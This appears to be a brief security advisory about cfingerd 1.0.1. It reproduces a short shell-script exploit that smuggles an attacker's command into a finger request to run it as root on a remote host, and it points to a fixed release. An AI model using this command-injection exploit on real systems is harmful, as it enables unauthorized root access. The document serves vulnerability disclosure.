COMMAND

    cfingerd

SYSTEMS AFFECTED

    Systems using cfingerd 1.0.1

PROBLEM

    The  following  shell  script  exploits vulnerability in cfingerd.
    By  running  this  you  can  execute  arbitrary  commands as root.
    Exploit was written by east <east@l0ck.com>

    echo "l0ck r0x w1f gl0x"

    if [ $# = 2 ]
      then
      finger "/W;$1;#@$2"
    else
      echo "$0 \"<command>\" <sitename>"
    fi

SOLUTION

    Please find the new version of cfingerd at:

        ftp://ftp.infodrom.north.de/pub/people/joey/cfingerd/

    A general homepage has been created at

        http://www.Infodrom.North.DE/cfingerd/